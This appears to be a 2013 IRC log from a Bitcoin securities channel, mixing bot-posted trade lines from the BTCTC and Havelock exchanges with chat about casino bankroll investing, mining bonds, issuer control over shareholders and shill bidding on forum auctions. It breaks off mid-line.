23:33:09 [22:44] but I think it is optimal for other investors Jun 21 23:33:09 [22:44] how so? Jun 21 23:33:09 [22:45] the casino needs money one time and one time only : when it just lost. Jun 21 23:33:10 [22:45] this model ensures he has money one time and one time only : when it just won. Jun 21 23:33:10 [22:45] total mismatch. Jun 21 23:33:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.032489 BTC [+] Jun 21 23:33:40 [BTCTC] [COGNITIVE] 1 @ 0.28659 BTC [+] Jun 21 23:33:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.032489 = 0.1624 BTC [+] Jun 21 23:33:41 [BTCTC] [COG.F] 1 @ 3.74998 BTC [+] Jun 21 23:34:33 [BTCTC] [ASICMINER-PT] 1 @ 3.192001 BTC [+] Jun 21 23:34:35 [BTCTC] [ASICMINER-PT] 1 @ 3.192 BTC [-] Jun 21 23:34:37 [HAVELOCK] [ASICM] 12 @ 0.031889 = 0.3827 BTC [+] Jun 21 23:34:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.032489 = 0.0975 BTC [+] Jun 21 23:34:46 [HAVELOCK] [ASICM] 5 @ 0.03118 = 0.1559 BTC [-] Jun 21 23:34:55 [BTCTC] [COGNITIVE] 3 @ 0.2866 = 0.8598 BTC [+] Jun 21 23:34:58 [BTCTC] [ASICMINER-PT] 1 @ 3.191 BTC [-] Jun 21 23:35:01 [BTCTC] [ASICMINER-PT] 1 @ 3.1801 BTC [-] Jun 21 23:35:38 [HAVELOCK] [ASICM] 21 @ 0.031889 = 0.6697 BTC [+] Jun 21 23:37:18 [BTCTC] [ASICMINER-PT] 1 @ 3.160199 BTC [-] Jun 21 23:37:20 [BTCTC] [ASICMINER-PT] 1 @ 3.1511 BTC [-] Jun 21 23:37:22 [BTCTC] [ASICMINER-PT] 1 @ 3.1501 BTC [-] Jun 21 23:37:53 [HAVELOCK] [ASICM] 24 @ 0.031889 = 0.7653 BTC [+] Jun 21 23:39:06 [HAVELOCK] [ASICM] 7 @ 0.03189 = 0.2232 BTC [+] Jun 21 23:39:53 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005556 = 0.2778 BTC [+] Jun 21 23:41:26 the casino needs money to be able to offer bets though, right? I don't know whether the player will win or lose until he plays, so I have to have money to back his bet Jun 21 23:43:02 [BTCTC] [ASICMINER-PT] 1 @ 3.1101 BTC [-] Jun 21 23:43:04 [BTCTC] [ASICMINER-PT] 2 @ 3.11 = 6.22 BTC [-] Jun 21 23:43:07 [BTCTC] [ASICMINER-PT] 12 @ 3.101 = 37.212 BTC [-] Jun 21 23:43:23 are you retaining enough of the winnings for yourself? Jun 21 23:43:42 to further dev, design, promo, etc? Jun 21 23:43:58 [BTCTC] [TAT.ASICMINER] 49 @ 0.031201 = 1.5288 BTC [-] Jun 21 23:44:23 [BTCTC] [TAT.ASICMINER] 21 @ 0.0312 = 0.6552 BTC [-] Jun 21 23:44:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.031102 = 0.0622 BTC [-] Jun 21 23:44:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.031101 = 0.0933 BTC [-] Jun 21 23:44:29 [BTCTC] [TAT.ASICMINER] 100 @ 0.0311 = 3.11 BTC [-] Jun 21 23:44:51 [BTCTC] [ASICMINER-PT] 1 @ 3.062234 BTC [-] Jun 21 23:45:47 [BTCTC] [TAT.ASICMINER] 12 @ 0.03102 = 0.3722 BTC [-] Jun 21 23:45:50 I don't know, to be honest. I charge a 1% commission on investor net profits per week Jun 21 23:45:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.031 BTC [-] Jun 21 23:45:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.0305 = 0.1525 BTC [-] Jun 21 23:45:52 Not necessarily, dooglus.. You could have players bet against each other. Kind of like bitbet with a 'market prediction' system where you take a rakeback Jun 21 23:45:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.0302 = 0.0604 BTC [-] Jun 21 23:45:56 [BTCTC] [TAT.ASICMINER] 22 @ 0.0301 = 0.6622 BTC [-] Jun 21 23:45:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.03004 BTC [-] Jun 21 23:45:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.03001 BTC [-] Jun 21 23:46:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [-] Jun 21 23:46:35 and have a part of the bankroll myself. I don't need to make much for the site to support itself Jun 21 23:46:49 if 1% isn't enough, I'll increase it Jun 21 23:48:01 [BTCTC] [ASICMINER-PT] 2 @ 3.052 = 6.104 BTC [-] Jun 21 23:48:05 [BTCTC] [ASICMINER-PT] 6 @ 3.051 = 18.306 BTC [-] Jun 21 23:48:06 [BTCTC] [ASICMINER-PT] 2 @ 3.05 = 6.1 BTC [-] Jun 21 23:48:08 [BTCTC] [ASICMINER-PT] 1 @ 3.03 BTC [-] Jun 21 23:48:15 [BTCTC] [ASICMINER-PT] 2 @ 3.0226 = 6.0452 BTC [-] Jun 21 23:48:23 oh, so the arrangement with investors is not binding? Jun 21 23:48:32 yu can take whatever cut you chose? Jun 21 23:49:09 that's a great deal! Jun 21 23:49:32 [HAVELOCK] [ASICM] 10 @ 0.03111 = 0.3111 BTC [-] Jun 21 23:49:34 [HAVELOCK] [ASICM] 139 @ 0.031013 = 4.3108 BTC [-] Jun 21 23:49:35 [HAVELOCK] [ASICM] 3 @ 0.031012 = 0.093 BTC [-] Jun 21 23:49:36 [HAVELOCK] [ASICM] 5 @ 0.031011 = 0.1551 BTC [-] Jun 21 23:49:37 [BTCTC] [ASICMINER-PT] 2 @ 2.45 = 4.9 BTC [-] Jun 21 23:49:38 [HAVELOCK] [ASICM] 15 @ 0.03101 = 0.4652 BTC [-] Jun 21 23:49:39 [HAVELOCK] [ASICM] 3 @ 0.031001 = 0.093 BTC [-] Jun 21 23:49:40 [HAVELOCK] [ASICM] 525 @ 0.031 = 16.275 BTC [-] Jun 21 23:50:11 [BTCTC] [ASICMINER-PT] 1 @ 2.788 BTC [+] Jun 21 23:50:13 [BTCTC] [GSDPT] 2 @ 0.002141 = 0.0043 BTC [+] Jun 21 23:50:26 [BTCTC] [ASICMINER-PT] 1 @ 3.149999 BTC [+] Jun 21 23:50:54 If I ever start a security, I need some kind of Benevolent Dictator for Life clause Jun 21 23:50:55 [BTCTC] [ASICMINER-PT] 6 @ 2.8 = 16.8 BTC [-] Jun 21 23:51:15 [BTCTC] [ASICMINER-PT] 9 @ 2.8 = 25.2 BTC [-] Jun 21 23:51:30 i have a lesser version in mine Jun 21 23:51:33 But then I'd only sell off a portion of the shares, so if it came to voting I'd have all of the sway anyway Jun 21 23:51:42 no voting rights Jun 21 23:51:44 [BTCTC] [ASICMINER-PT] 10 @ 2.88 = 28.8 BTC [+] Jun 21 23:51:54 and i reserve the right to do whatever is in the best interest of shareholders Jun 21 23:52:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [-] Jun 21 23:52:55 mostly i just dont wanna deal with cotes Jun 21 23:52:57 votes Jun 21 23:53:08 s/votes/plebes Jun 21 23:53:30 man, you're chasing freedom and running a thing where you have shareholders Jun 21 23:53:38 with concomittant obligations Jun 21 23:53:54 not that i want to Jun 21 23:53:55 but Jun 21 23:53:59 i can close them anytime Jun 21 23:54:03 is this a perpetual hustle? how do you plan to extricate yourself? Jun 21 23:54:22 well with TAT.AM Jun 21 23:54:29 [BTCTC] [TAT.ASICMINER] 4 @ 0.03 = 0.12 BTC [-] Jun 21 23:54:33 I have several ways Jun 21 23:54:40 I could pass it to someone else Jun 21 23:54:58 or I could give everyone direct shares in echange Jun 21 23:55:01 or such Jun 21 23:55:10 with TATVM Jun 21 23:55:16 Ihave two methods of buyout Jun 21 23:55:34 and ability to pass to someone else as well Jun 21 23:55:50 which would be a bit more tricky in that case Jun 21 23:56:03 since they are backed Jun 21 23:56:09 and have daily payouts due Jun 21 23:57:10 [BTCTC] [TAT.VIRTUALMINE] 26 @ 0.005852 = 0.1522 BTC [+] Jun 21 23:57:28 [HAVELOCK] [ASICM] 4 @ 0.03189 = 0.1276 BTC [+] Jun 21 23:57:36 you've spent a serious amount of time building your identity and trust therein. handing that over is going to be extremely nontrivial. Jun 21 23:57:58 depends who I hand it to Jun 21 23:58:11 ofc Jun 21 23:58:28 but Jun 21 23:58:28 but the usual suspects have their hands somewhat full Jun 21 23:58:40 this is not the path currently anyway Jun 21 23:58:49 growth is still impending Jun 21 23:59:54 I have several seeds still germinating, just a matter of which will be harvested first Jun 22 00:00:09 best of luck Jun 22 00:01:09 where do you announce your new projects? Jun 22 00:01:09 luck separates the brave from the foolish Jun 22 00:01:22 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00585 = 0.585 BTC [-] Jun 22 00:01:56 when they are ready, as forum threads Jun 22 00:02:11 otherwise, in private conversations with people in the know Jun 22 00:02:20 god, I sound like mp... Jun 22 00:02:49 tactics of competence Jun 22 00:02:50 [BTCTC] [ASICMINER-PT] 18 @ 2.88 = 51.84 BTC [+] Jun 22 00:03:05 I will have an announcement soon though Jun 22 00:03:10 less than a week Jun 22 00:03:53 [BTCTC] [ASICMINER-PT] 1 @ 3.04 BTC [+] Jun 22 00:03:55 [BTCTC] [ASICMINER-PT] 1 @ 3.027 BTC [-] Jun 22 00:03:57 [BTCTC] [ASICMINER-PT] 19 @ 3.0226 = 57.4294 BTC [-] Jun 22 00:03:58 [BTCTC] [ASICMINER-PT] 2 @ 3.012 = 6.024 BTC [-] Jun 22 00:04:00 [BTCTC] [ASICMINER-PT] 1 @ 3.004 BTC [-] Jun 22 00:04:03 [BTCTC] [ASICMINER-PT] 5 @ 3 = 15 BTC [-] Jun 22 00:04:05 [BTCTC] [ASICMINER-PT] 6 @ 3 = 18 BTC [-] Jun 22 00:04:07 [BTCTC] [ASICMINER-PT] 11 @ 3 = 33 BTC [-] Jun 22 00:04:32 [BTCTC] [ASICMINER-PT] 47 @ 2.88 = 135.36 BTC [-] Jun 22 00:04:52 Such a wide spread today Jun 22 00:04:58 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [+] Jun 22 00:05:17 2.89 - 3.27 Jun 22 00:05:17 it's just options coming due Jun 22 00:05:26 buyers dont have day jobs I guess Jun 22 00:07:41 [BTCTC] [ASICMINER-PT] 1 @ 3.001 BTC [+] Jun 22 00:07:43 [BTCTC] [ASICMINER-PT] 1 @ 3.000001 BTC [-] Jun 22 00:07:45 [BTCTC] [ASICMINER-PT] 3 @ 3 = 9 BTC [-] Jun 22 00:07:47 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Jun 22 00:07:58 [HAVELOCK] [ASICM] 75 @ 0.031 = 2.325 BTC [-] Jun 22 00:08:09 [BTCTC] [ASICMINER-PT] 2 @ 2.98 = 5.96 BTC [-] Jun 22 00:09:00 I really need to make that candlestick graph Jun 22 00:09:27 A couple of people hit me up on Google+ asking for it Jun 22 00:19:06 [BTCTC] [ASICMINER-PT] 2 @ 2.951 = 5.902 BTC [-] Jun 22 00:19:12 [BTCTC] [ASICMINER-PT] 2 @ 2.9501 = 5.9002 BTC [-] Jun 22 00:19:15 [BTCTC] [ASICMINER-PT] 2 @ 2.95001 = 5.9 BTC [-] Jun 22 00:19:41 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00514 = 0.0411 BTC [-] Jun 22 00:20:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [-] Jun 22 00:21:15 [BTCTC] [ASICMINER-PT] 1 @ 2.901 BTC [-] Jun 22 00:22:35 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Jun 22 00:22:37 [BTCTC] [ASICMINER-PT] 2 @ 2.9 = 5.8 BTC [-] Jun 22 00:22:39 [BTCTC] [ASICMINER-PT] 3 @ 2.9 = 8.7 BTC [-] Jun 22 00:22:59 [BTCTC] [ASICMINER-PT] 2 @ 2.9 = 5.8 BTC [-] Jun 22 00:24:28 [BTCTC] [ASICMINER-PT] 2 @ 2.9 = 5.8 BTC [-] Jun 22 00:27:08 [BTCTC] [MININGCO.ETF] 1 @ 0.8299 BTC [+] Jun 22 00:27:49 [HAVELOCK] [ASICM] 6 @ 0.031389 = 0.1883 BTC [+] Jun 22 00:31:11 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.005779 = 0.0289 BTC [+] Jun 22 00:32:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005101 BTC [-] Jun 22 00:32:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0051 BTC [-] Jun 22 00:32:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005 BTC [-] Jun 22 00:32:48 [BTCTC] [TAT.VIRTUALMINE] 134 @ 0.004802 = 0.6435 BTC [-] Jun 22 00:32:51 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004801 BTC [-] Jun 22 00:32:53 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004801 = 0.024 BTC [-] Jun 22 00:32:55 [BTCTC] [TAT.VIRTUALMINE] 169 @ 0.0048 = 0.8112 BTC [-] Jun 22 00:33:02 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0048 BTC [-] Jun 22 00:33:03 [BTCTC] [BTC-BOND] 2 @ 0.0099 = 0.0198 BTC [-] Jun 22 00:33:05 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00475 = 0.475 BTC [-] Jun 22 00:33:06 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00464 BTC [-] Jun 22 00:34:02 LMAO Jun 22 00:34:02 >If you mistrust Garr255, use the trust system. I'm not going to remove anyone from the default trust network for rating Garr255 negatively. But scammer tags require a more severe crime than just going against the expectations of bidders. Jun 22 00:34:07 ~theymos Jun 22 00:34:20 [BTCTC] [TAT.VIRTUALMINE] 128 @ 0.004621 = 0.5915 BTC [-] Jun 22 00:34:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.03 = 0.15 BTC [-] Jun 22 00:36:31 [BTCTC] [TAT.VIRTUALMINE] 26 @ 0.005769 = 0.15 BTC [+] Jun 22 00:39:04 [HAVELOCK] [ASICM] 1 @ 0.030999 BTC [-] Jun 22 00:42:51 [BTCTC] [TAT.ASICMINER] 6 @ 0.031898 = 0.1914 BTC [+] Jun 22 00:44:53 [BTCTC] [ASICMINER-PT] 1 @ 2.999899 BTC [+] Jun 22 00:47:37 We have standards when it comes to scammers, cmon now! Jun 22 00:48:51 we dont go all willy nilly pointing out just any scammer Jun 22 00:49:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.03 = 0.09 BTC [-] Jun 22 00:49:50 [BTCTC] [DMS.MINING] 2 @ 0.015553 = 0.0311 BTC [-] Jun 22 00:49:52 [BTCTC] [DMS.MINING] 2 @ 0.015554 = 0.0311 BTC [+] Jun 22 00:50:01 [BTCTC] [TAT.ASICMINER] 25 @ 0.03 = 0.75 BTC [-] Jun 22 00:51:33 i bet you that a full investigation would reveal every single auiction ever conducted on that forum had shill bidding Jun 22 00:52:10 hm Jun 22 00:52:42 auctions, man. Jun 22 00:57:47 Jurov, where are the iDiff-Es? Jun 22 00:59:00 no cuts no butts no coconuts Jun 22 01:02:39 pretty sure shill bidding is illegal in some places Jun 22 01:02:57 bitcointalk aint one of em Jun 22 01:03:13 whats theymos trust rating looking like? Jun 22 01:04:21 i bet most dont have the balls to rate him negatibe Jun 22 01:04:24 v Jun 22 01:06:03 [BTCTC] [B.YABMC] 1 @ 0.009 BTC [+] Jun 22 01:06:12 [BTCTC] [TAT.ASICMINER] 65 @ 0.03 = 1.95 BTC [-] Jun 22 01:06:14 [BTCTC] [TAT.ASICMINER] 28 @ 0.0299 = 0.8372 BTC [-] Jun 22 01:06:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.0298 = 0.2384 BTC [-] Jun 22 01:06:44 The way it is now, If you negrated him- you could be negrated by 50 shill accounts correct? Jun 22 01:07:12 all wots have an originator. negrating him is nonsense anyway Jun 22 01:07:24 .bait Jun 22 01:07:28 http://25.media.tumblr.com/tumblr_m7oao4iZXi1qfaf1fo1_1280.jpg Jun 22 01:07:32 I mean on the forum Jun 22 01:07:42 that is what TAT was referring to Jun 22 01:07:52 mp is right Jun 22 01:08:13 well, I agree it is dumb- not arguing that Jun 22 01:08:43 "-Epic Talent Acquisition for Cryptocurrency Enterprise Demands" Jun 22 01:08:53 soon enough they'll start writing in german Jun 22 01:09:09 mein Leben! Jun 22 01:09:35 jborkl_ not a matter of dumb necessarily more like meaningless. you are using his system (therefore trusting it) to express... your lack of trust in him. Jun 22 01:09:38 where do i sign up? Jun 22 01:09:40 how doth this work, logically. Jun 22 01:09:45 .bait Jun 22 01:09:49 http://25.media.tumblr.com/tumblr_m7qmoi42tn1rxvvsao1_500.jpg Jun 22 01:10:06 sorta hit and miss Jun 22 01:10:18 nice having ozbot around tho Jun 22 01:11:47 [BTCTC] [ASICMINER-PT] 38 @ 2.89 = 109.82 BTC [-] Jun 22 01:12:05 ok. done buying. Price may resume rising now Jun 22 01:12:13 carry on :) Jun 22 01:12:56 another perpetual mining bond is going to be trade on BTCT.CO SOSLOVE868 Jun 22 01:13:12 this is the way the world ends! Jun 22 01:13:22 srsly, if you need proof the shit's a dfucking scam Jun 22 01:13:40 what better than "Every noob is making one" Jun 22 01:14:19 Deprived won though Jun 22 01:14:33 he made is a blackhole Jun 22 01:14:35 his Jun 22 01:15:03 how cheap do you want your PMB? Coming right up! Jun 22 01:15:24 when do you anticipate assplosion of failure, TAT? Jun 22 01:15:43 [BTCTC] [CRYPTO-TRADE] 7 @ 0.199995 = 1.4 BTC [+] Jun 22 01:16:18 [HAVELOCK] [ASICM] 1 @ 0.031579 BTC [+] Jun 22 01:16:40 when the supply of amatuer professional bitcoin investors is exhausted Jun 22 01:17:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.031893 = 0.0638 BTC [+] Jun 22 01:17:31 [BTCTC] [TAT.ASICMINER] 50 @ 0.031896 = 1.5948 BTC [+] Jun 22 01:17:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.031897 = 0.1914 BTC [+] Jun 22 01:17:55 [HAVELOCK] [ASICM] 6 @ 0.031579 = 0.1895 BTC [+] Jun 22 01:20:43 lol Jun 22 01:21:54 has the supply of amateur professional investors been exhausted in the traditional markets? Jun 22 01:22:05 will it ever in this? Jun 22 01:22:43 hmm Jun 22 01:22:49 maybe instead, Jun 22 01:23:15 when a more appealing carrot is engineered Jun 22 01:24:23 benkay yes, actually. once actual investors become the majority, Jun 22 01:24:39 the type of retards causing the problems get pissy about being marginalised and move Jun 22 01:24:40 what's the higher order of ponzis and rapidly commoditized markets? Jun 22 01:24:57 higher order? Jun 22 01:25:04 fractional banking? Jun 22 01:25:13 [BTCTC] [ASICMINER-PT] 1 @ 3.1388 BTC [+] Jun 22 01:25:15 ripple? Jun 22 01:25:23 https://bitcointalk.org/index.php?topic=238474.msg2544869#msg2544869 Jun 22 01:25:25 i'd say stuff like picostocks Jun 22 01:25:28 Garr255/Werner - Auction shilling Jun 22 01:25:47 [BTCTC] [TAT.ASICMINER] 25 @ 0.031799 = 0.795 BTC [-] Jun 22 01:25:49 or anyway. stock generation type of things. Jun 22 01:26:39 what makes picostocks the next order? Jun 22 01:26:52 that they peddle assets without building trust first? Jun 22 01:27:13 .g "stock generation" Jun 22 01:27:24 how do you google with this thing ? Jun 22 01:27:31 .h Jun 22 01:27:34 All commands can be processed in channel or in PM Jun 22 01:27:34 Commands: .bait .count .diff .earn .exchange .nethash .rates .lcrates .tslb Jun 22 01:27:39 you dont Jun 22 01:27:50 sux Jun 22 01:27:52 http://en.wikipedia.org/wiki/Stock_Generation there Jun 22 01:28:20 so essentially BTCT.co is this? Jun 22 01:29:00 unwittingly perhaps Jun 22 01:29:16 and without guarantees Jun 22 01:29:19 SG stuff was all totally fake though right? Jun 22 01:29:30 like it really was a game Jun 22 01:29:58 right. Jun 22 01:30:02 totally made up shit. Jun 22 01:30:30 there's a difference between an actual virtual corp and an imaginary virtual corp Jun 22 01:30:35 as absurd as that may sound on the face. Jun 22 01:31:36 in theory, every single mining asset could be this Jun 22 01:32:06 other than ones that actually prove they have ghardware or sell it Jun 22 01:32:13 not really. this is why the operator shows his rigs etc. Jun 22 01:32:15 well yes. Jun 22 01:32:36 that's why people like goat or ciuciu never actually producing proof of their supposed mining hardware are iffy. Jun 22 01:32:42 course this all may be before your time Jun 22 01:32:54 and what of virtual PMBs Jun 22 01:33:01 saying what they are at the start Jun 22 01:33:11 [BTCTC] [TAT.ASICMINER] 16 @ 0.031799 = 0.5088 BTC [-] Jun 22 01:33:34 with real backing Jun 22 01:33:34 well, they ride on the name of whoever makes them. Jun 22 01:33:52 basically you're taking the owner's cp risk in a futures contract. Jun 22 01:34:12 anyone with a clue would just call things what they are (ie, futures) rather than pretend they're "making a company" Jun 22 01:34:16 mircea_popescu: mr. chairman Jun 22 01:34:32 i debated making mine futures Jun 22 01:34:36 and even altering the design Jun 22 01:34:43 to be more like a future Jun 22 01:34:44 what;'s up thestringpuller Jun 22 01:34:45 but Jun 22 01:35:01 but i feared people would be like Jun 22 01:35:01 [BTCTC] [ASICMINER-PT] 1 @ 3.14159 BTC [+] Jun 22 01:35:04 fuwhatnows? Jun 22 01:35:23 right Jun 22 01:35:33 instead i got Jun 22 01:35:37 the type of retards causing the problems get pissy about being marginalised and move << Jun 22 01:35:39 THIS IS NOT A BOND DAMMIT Jun 22 01:35:46 cant win i guess Jun 22 01:35:54 customers man Jun 22 01:36:20 can't live with 'em, can't read their emails without wanting to rip your eyeballs out. Jun 22 01:36:27 can't live *without* 'em Jun 22 01:36:40 i still get people asking me how divs are determined Jun 22 01:37:04 the formula is of course included in the description Jun 22 01:37:16 ya but don't you have a simpler one ? Jun 22 01:38:07 .earn 1 Jun 22 01:38:07 At 1 MH/s, you should earn 0.00002600 BTC/day ($0.00) on average (0.00000108 BTC/hr) Jun 22 01:38:23 but then i'd have to teach everyone how to join IRC Jun 22 01:38:28 do we really want that? Jun 22 01:38:49 [BTCTC] [DMS.MINING] 36 @ 0.015554 = 0.5599 BTC [+] Jun 22 01:38:50 [BTCTC] [DMS.MINING] 345 @ 0.015554 = 5.3661 BTC [+] Jun 22 01:39:16 .earn 1000 Jun 22 01:39:18 [BTCTC] [S.DICE-PT] 92 @ 0.002702 = 0.2486 BTC [+] Jun 22 01:39:28 At 1000 MH/s, you should earn 0.02600483 BTC/day ($2.84) on average (0.00108353 BTC/hr) Jun 22 01:39:29 slow bot is slow. Jun 22 01:39:46 .earn my love Jun 22 01:39:47 -.- Jun 22 01:39:47 -.- Jun 22 01:39:47 earn currently unavailable Jun 22 01:39:52 kk Jun 22 01:40:05 lol Jun 22 01:42:38 [BTCTC] [DMS.MINING] 19 @ 0.015678 = 0.2979 BTC [+] Jun 22 01:42:39 so a 1 year payback at current lowest ask on btct for virtualmine Jun 22 01:43:02 216 days Jun 22 01:43:35 that's certainly attractive. Jun 22 01:43:39 less sale price Jun 22 01:43:58 wat Jun 22 01:44:14 well it never redeems Jun 22 01:44:18 so you can sell it Jun 22 01:44:24 oic Jun 22 01:44:33 yeah but i'm a pessimist. Jun 22 01:44:40 rightly so Jun 22 01:44:56 difficulty rocketed the two weeks after release Jun 22 01:45:12 and i'm stealthily equating the purchase of VM with the purchase of real hardware, which depreciates to zero Jun 22 01:45:26 hardware can be sold too Jun 22 01:45:31 [BTCTC] [TAT.ASICMINER] 7 @ 0.031799 = 0.2226 BTC [-] Jun 22 01:45:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.031799 = 0.0636 BTC [-] Jun 22 01:45:49 thats the only logic that could make an AM Blade woth 50btc Jun 22 01:45:53 mworth* Jun 22 01:45:57 worth... Jun 22 01:46:02 mine with it for a few weeks Jun 22 01:46:04 then sell it Jun 22 01:46:28 hm Jun 22 01:46:41 a megahash is a megahash, except when it's a smaller piece of the pie Jun 22 01:47:16 so i'd have to keep dumping my divs back into the asset to keep my income stream up Jun 22 01:47:25 ugh these coupled systems Jun 22 01:48:33 i never actually ran the numbers, to see if reinvestment could keep you afloat Jun 22 01:48:43 unlikley if diff rises 20% every time Jun 22 01:49:18 why should i buy them, then? Jun 22 01:49:30 honest question, I seriously don't understand the mining bond craze. Jun 22 01:49:45 (implying i'm trolling at all other times) Jun 22 01:50:22 the reasons why are listed in the asset description Jun 22 01:50:25 but there are more Jun 22 01:50:39 to flip them should they become overvalued Jun 22 01:50:54 and if you think diff will not rise fast enough Jun 22 01:50:57 or at all Jun 22 01:51:05 otherwise Jun 22 01:51:09 the asset descr says Jun 22 01:51:26 1. To provide the most affordable and competitive alternative to other mining assets currently available. Jun 22 01:51:27 2. To provide an easy choice for investors to earn mining rewards without the responsibility and hassle of running personal mining rigs and farms. Jun 22 01:51:39 Deprived beat me on 1) though Jun 22 01:51:54 although I could theoretically issue more Jun 22 01:51:59 to match his price... Jun 22 01:53:25 it was a diffe3rent world when i ussed them Jun 22 01:53:30 issued Jun 22 01:54:34 [BTCTC] [S.MPOE-PT] 20 @ 0.00075 = 0.015 BTC [-] Jun 22 01:55:56 [BTCTC] [S.DICE-PT] 2 @ 0.002702 = 0.0054 BTC [+] Jun 22 01:55:58 [BTCTC] [S.DICE-PT] 10 @ 0.002703 = 0.027 BTC [+] Jun 22 01:56:01 [BTCTC] [S.DICE-PT] 50 @ 0.00271 = 0.1355 BTC [+] Jun 22 01:56:02 [BTCTC] [S.DICE-PT] 30 @ 0.002715 = 0.0815 BTC [+] Jun 22 01:56:04 [BTCTC] [S.DICE-PT] 1 @ 0.002719 BTC [+] Jun 22 01:56:04 [BTCTC] [S.DICE-PT] 34 @ 0.00272 = 0.0925 BTC [+] Jun 22 01:58:06 honest question, I seriously don't understand the mining bond craze. << people want to participate. Jun 22 01:58:34 "The relationship between the fandom and the actual profession is always, absolutely always and without exception one of extraction. Specifically, resources are sucked out of the fandom for the benefit of the profession." Jun 22 01:58:49 teh bitcoin fandom wishes to pay. Jun 22 02:00:25 [BTCTC] [BTC-TRADING-PT] 1 @ 0.5865 BTC [-] Jun 22 02:06:24 [BTCTC] [BTC-TRADING-PT] 3 @ 0.5867 = 1.7601 BTC [+] Jun 22 02:08:02 elaborate extraction games errywhere Jun 22 02:13:03 "As many of you know, the pantry was put in place for your personal consumption while you are at work. Unfortunately, over the past few months there have been several instances where employees have been observed filling bags with sodas, snacks, fruit, and in some cases cartons of milk, to take home with them. It has become so excessive that in the last few weeks there have been multiple times when the coolers were almo Jun 22 02:13:03 st completely empty prior to the end of a workday. Employees who worked later in the day, or over the weekend, found there were essentially no snacks or drinks available." Jun 22 02:13:12 famine in teh us ? ppl stealing food from workplace nao ? Jun 22 02:13:28 link? Jun 22 02:14:16 http://jimromenesko.com/2013/06/21/bloomberg-bna-has-surveillance-cameras-watching-the-snack-pantry/ Jun 22 02:14:20 » [UPDATED] Bloomberg BNA to put surveillance cameras in the snack pantry JIMROMENESKO.COM Jun 22 02:14:21 mp i saw a man holding a sign by an offramp that served a self-serve gas station yesterday. Jun 22 02:14:25 shit is getting *bad* Jun 22 02:14:34 served *only* a self-serve gas station. Jun 22 02:14:51 shortly thereafter i saw not one but two men holding signs for the same company, on the same corner. Jun 22 02:15:06 doubt either were making law-required minimum wage. Jun 22 02:16:03 kinda sucky. Jun 22 02:16:42 *shrug* Jun 22 02:16:46 part of the cycle. Jun 22 02:16:55 i've been getting the jitters Jun 22 02:17:07 i'd really hate to be trying to get rich right before shit went tits-up Jun 22 02:17:19 and i'd really hate to be preparing for shit to go tits-up ten years too early Jun 22 02:17:31 until 2 weeks ago i was convinced i had another decade to get rich Jun 22 02:17:44 mood has changed here. Jun 22 02:17:52 well tell you what, Jun 22 02:18:04 if i went for snacks and there were no snacks i'd just fire everybody. Jun 22 02:18:25 must be nice to be unencumbered by unions Jun 22 02:21:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.031799 = 0.0954 BTC [-] Jun 22 02:24:00 it is. Jun 22 02:24:14 [BTCTC] [TAT.ASICMINER] 65 @ 0.0318 = 2.067 BTC [+] Jun 22 02:25:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.0318 BTC [+] Jun 22 02:25:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.0318 = 0.1272 BTC [+] Jun 22 02:27:29 [BTCTC] [ASICMINER-PT] 1 @ 3.1799 BTC [+] Jun 22 02:27:31 [BTCTC] [ASICMINER-PT] 2 @ 3.18 = 6.36 BTC [+] Jun 22 02:27:33 [BTCTC] [ASICMINER-PT] 1 @ 3.1998 BTC [+] Jun 22 02:27:34 [BTCTC] [ASICMINER-PT] 1 @ 3.1999 BTC [+] Jun 22 02:27:36 [BTCTC] [ASICMINER-PT] 2 @ 3.244 = 6.488 BTC [+] Jun 22 02:27:37 [BTCTC] [ASICMINER-PT] 1 @ 3.26 BTC [+] Jun 22 02:27:39 [BTCTC] [ASICMINER-PT] 2 @ 3.274 = 6.548 BTC [+] Jun 22 02:31:33 [BTCTC] [COGNITIVE] 2 @ 0.2866 = 0.5732 BTC [+] Jun 22 02:35:45 [HAVELOCK] [ASICM] 49 @ 0.031538 = 1.5454 BTC [-] Jun 22 02:36:23 [HAVELOCK] [ASICM] 3 @ 0.031598 = 0.0948 BTC [+] Jun 22 02:37:16 [BTCTC] [ASICMINER-PT] 1 @ 3.273 BTC [-] Jun 22 02:40:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.031799 = 0.318 BTC [-] Jun 22 02:41:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.031799 = 0.159 BTC [-] Jun 22 02:41:53 dooglus hey there. Jun 22 02:44:09 [HAVELOCK] [VTX] 43 @ 0.423021 = 18.1899 BTC [-] Jun 22 02:53:00 [BTCTC] [TAT.ASICMINER] 59 @ 0.0318 = 